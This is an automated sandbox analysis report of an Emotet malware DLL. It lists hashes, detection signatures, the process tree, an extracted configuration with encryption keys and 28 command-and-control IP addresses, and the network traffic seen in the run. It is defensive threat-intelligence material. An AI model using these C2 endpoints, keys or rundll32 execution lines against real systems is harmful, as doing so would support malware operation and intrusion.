Play interactive tour

Edit tour

Windows Analysis Report NjTYb3VyzV

Overview

General Information

Sample Name:	NjTYb3VyzV (renamed file extension from none to dll)
Analysis ID:	528810
MD5:	944f5dec057269043eeb02d551e1593f
SHA1:	c6dc40330793e23a88753d1a5ba18142a0eb33b9
SHA256:	651b117d5a6c37b255cbfa465740b4ea3cea29d41175338c83b1d5b416c29a01
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3012 cmdline: loaddll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 1536 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4624 cmdline: rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4692 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5116 cmdline: rundll32.exe C:\Users\user\Desktop\NjTYb3VyzV.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6648 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu",ZUcsEM MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 5732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6080 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"], "C2 list": ["91.200.186.228:443", "41.76.108.46:8080", "188.165.214.166:7080", "191.252.196.221:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.868792580.0000000004CE0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.349560826.0000000004B40000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.349903901.0000000004CF0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.349400359.00000000046F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.350183619.0000000004ED0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868395885.0000000004820000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868126623.0000000004090000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.869093007.00000000050C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.351790067.0000000004030000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.867289690.0000000000670000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868949205.0000000004EC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.350335367.0000000005130000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868865834.0000000004DC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868491768.0000000004980000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.869173450.0000000005140000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868282805.0000000004620000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.348479056.00000000045F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868570789.00000000049E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.350044975.0000000004E70000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.868675450.0000000004BC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.4ce0000.14.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4cf0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5140000.22.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4ed0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4980000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.46f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.46f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4b40000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4030000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4820000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4dc0000.16.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4cf0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4980000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4620000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4030000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4090000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.49e0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.45f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.50c0000.20.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4e70000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4620000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4ec0000.18.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.670000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4bc0000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.670000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5140000.22.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4bc0000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4820000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.49e0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4ec0000.18.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.45f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.50c0000.20.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4090000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4dc0000.16.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4ed0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5130000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4ce0000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4b40000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.5130000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.4e70000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 35 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu",ZUcsEM, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6648, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL, ProcessId: 1972

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.2.rundll32.exe.4980000.8.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"], "C2 list": ["91.200.186.228:443", "41.76.108.46:8080", "188.165.214.166:7080", "191.252.196.221:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"]}

Multi AV Scanner detection for submitted file

Show sources

Source: NjTYb3VyzV.dll

Virustotal: Detection: 13%

Perma Link

Machine Learning detection for sample

Show sources

Source: NjTYb3VyzV.dll

Joe Sandbox ML: detected

Source: NjTYb3VyzV.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100062E3 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__EH_prolog3,lstrlenA,FtpFindFirstFileA,	2_2_100062E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10004E7C FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	2_2_10004E7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418B2CC FindFirstFileW,	8_2_0418B2CC

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.6:49762 -> 91.200.186.228:443
Source: Traffic	Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 41.76.108.46:8080 -> 192.168.2.6:49765

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 41.76.108.46 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.200.186.228 187			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 91.200.186.228:443
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 188.165.214.166:7080
Source: Malware configuration extractor	IPs: 191.252.196.221:8080
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 185.184.25.237:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 210.57.217.132:8080

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: global traffic

TCP traffic: 192.168.2.6:49765 -> 41.76.108.46:8080

Source: unknown

Network traffic detected: IP country count 19

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.186.228
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.186.228
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.186.228
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.186.228
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46
Source: unknown	TCP traffic detected without corresponding DNS query: 41.76.108.46

Source: svchost.exe, 00000011.00000003.466913007.00000125DAD8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 00000011.00000003.466913007.00000125DAD8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 00000011.00000003.466921694.00000125DAD9F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.466913007.00000125DAD8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000011.00000003.466921694.00000125DAD9F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.466913007.00000125DAD8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: svchost.exe, 00000011.00000002.483653675.00000125DAD00000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.862144227.00000197B5861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000011.00000002.483357499.00000125DA4EE000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.862144227.00000197B5861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
